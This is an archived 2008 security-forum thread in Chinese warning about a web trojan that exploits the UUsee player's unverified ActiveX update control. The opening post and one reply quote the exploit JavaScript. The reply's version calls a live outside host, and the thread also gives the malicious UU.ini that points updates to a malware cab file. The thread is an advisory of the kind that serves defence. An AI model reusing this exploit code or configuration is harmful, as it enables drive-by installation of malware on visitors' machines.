查看: 3374|回复: 14
收起左侧

[病毒样本] 【UUsee 0DAY网马已在互联网进行传播】

[复制链接]
ranguangning
头像被屏蔽
发表于 2008-6-17 10:38:32 | 显示全部楼层 |阅读模式
关于UUSee网络电视:UUSee网络电视2008,是悠视网打造的一款全新网络电视收看软件,用户使用这款软件可以免费收看500多路新颖频道,共计1000多个精彩节目。


受影响版本:UUSee网络电视2008 4.0.0.32 (UUUpgrade.ocx 3.0.2.12)


描述:


近期知道安全应急团队捕获到利用UUsee网络电视的漏洞进行攻击的网页木马在互联网传播。实际上UUsee网马在今年一月已经开始流传,直到近期开始被传播。


由于UUsee的升级控件(Clsid:{2CACD7BB-1C59-4BBB-8E81-6E83F82C813B}[UUUpgrade.ocx 3.0.2.12])在进行升级的时候没有对升级文件进行验证,所以可以通过构造恶意虚假的升级文件让UUsee下载特定的恶意程序并且运行。


部分代码如下:


try{var g; var storm=new ActiveXObject(”UUUPGRADE.UUUpgradeCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ var url=”http://***“; storm=(document.createElement(”object”)); ActivePerl=”-1C59-4BBB-8E8″; getSpraySlide=”1-6E83F82C813B”; helloworld2Address=”clsid:2CACD7BB”; storm.setAttribute(”classid”,helloworld2Address+ActivePerl+getSpraySlide) storm[”Update”](”\Program Files\Common Files\uusee\” ,url+”UU.ini”,”",1)}}


这段代码通过修改访问者的UU.ini,将UU.ini里的升级URL指向恶意文件来进行攻击,以下为UU.ini的内容:


[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1



另外,网络上最早出现UUsee网马生成器的截图:





官方暂无补丁。



[ 本帖最后由 ranguangning 于 2008-6-17 10:39 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
冷冷
发表于 2008-6-17 11:12:07 | 显示全部楼层
经常看到UUsee的下载器
fsr717af
发表于 2008-6-17 11:17:33 | 显示全部楼层
幸好没用UUsee
kitecity
发表于 2008-6-17 11:32:41 | 显示全部楼层
坏了,俺用这个玩意啊,赶紧卸载了
SW-27
发表于 2008-6-17 12:33:24 | 显示全部楼层
没用那个,太多广告~~~
电影结束了
发表于 2008-6-17 12:43:19 | 显示全部楼层
去下载玩玩
看看能不能找到
xqiafl
发表于 2008-6-17 16:02:48 | 显示全部楼层
我一次也没碰到过,   这个网马利用. 唉!! 真是失败!!
IVKIS
发表于 2008-6-17 16:06:30 | 显示全部楼层
看名字就不会用
sanhu35
发表于 2008-6-17 16:27:02 | 显示全部楼层
从来不用UUS
qianwenxiang
发表于 2008-6-17 18:17:52 | 显示全部楼层
记得12号解ADSITER.CN上面发现过UUSEE的
  1. url="http://adsiter.cn/";storm=document.createElement("object");ActivePerl="-1C59-4BBB-8E8";getSpraySlide="1-6E83F82C813B";helloworld2Address="clsid:2CACD7BB";storm.setAttribute("classid",helloworld2Address+ActivePerl+getSpraySlide);storm["Update"]("\Program Files\Common Files\uusee",url+"UU.ini","",1)}}try{var h;var glworld=new ActiveXObject("GLIEDown.IEDown.1")}catch(h){};finally{if(h!="[object Error]"){doc
复制代码
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-22 18:48 , Processed in 0.097295 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表